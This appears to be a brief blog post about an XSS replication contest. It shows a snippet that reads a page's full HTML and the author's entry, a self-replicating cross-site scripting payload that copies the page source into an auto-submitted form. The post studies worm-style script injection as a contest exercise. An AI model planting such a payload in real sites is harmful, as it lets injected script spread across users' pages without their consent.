Published 18 years 5 months ago • Last updated March 22, 2025 • ⏱️ < 1 min read
I've been having a lot of fun with the sla.ckers XSS replication contest and I found a cool way to replicate source code of the html document which I haven't seen anywhere before. Check it out:-
<pre lang="javascript"> alert(document.body.parentNode.innerHTML) </pre>This alerts the entire HTML document in Firefox (hopefully IE7 as well). Which is pretty cool :)
Here is my complete entry which submits the source of itself and posts the content:-
<pre lang="javascript"> <script>with(d=document)(b=body).innerHTML='<form><textarea name=content> '+b.parentNode.innerHTML.slice(126,-20);with(d.forms[0])submit(action=(method= 'post')+'.php')</script> </pre>The slice would have to be adjusted depending on the size of the document and the goal of the contest is to produce the smallest possible replication vector (with a couple of other rules).